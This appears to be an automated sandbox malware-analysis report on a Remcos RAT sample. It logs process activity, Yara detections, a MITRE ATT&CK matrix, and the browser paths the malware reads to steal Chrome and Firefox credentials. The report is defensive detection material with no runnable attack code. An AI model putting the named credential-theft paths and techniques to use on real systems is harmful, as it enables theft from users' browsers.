Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	13_2_004441AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	13_2_00444247
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_004442D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	13_2_0043D32C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	13_2_00444524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_0044464D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	13_2_00444754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	13_2_0040A7D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_00444821
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	13_2_0043CEC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	13_2_00443EE9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00401D6F GetLocalTime,CreateEventA,CreateThread,

13_2_00401D6F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00413CEA CreateThread,GetComputerNameExW,GetUserNameW,

13_2_00413CEA

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4512, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

13_2_00407EC0

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		13_2_00407FDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \key3.db		13_2_00407FDE

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JX5AIB

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4512, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: cmd.exe

13_2_00403B0B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	11 Windows Management Instrumentation	221 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	12 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Access Token Manipulation	3 Obfuscated Files or Information	2 Credentials In Files	1 Account Discovery	Remote Desktop Protocol	3 Clipboard Data	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Windows Service	1 Windows Service	1 Software Packing	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Command and Scripting Interpreter	Login Hook	211 Process Injection	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Service Execution	Network Logon Script	Network Logon Script	31 Virtualization/Sandbox Evasion	LSA Secrets	34 System Information Discovery	SSH	Keylogging	1 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	31 Security Software Discovery	VNC	GUI Input Capture	12 Application Layer Protocol	Data Transfer Size Limits	Service Stop
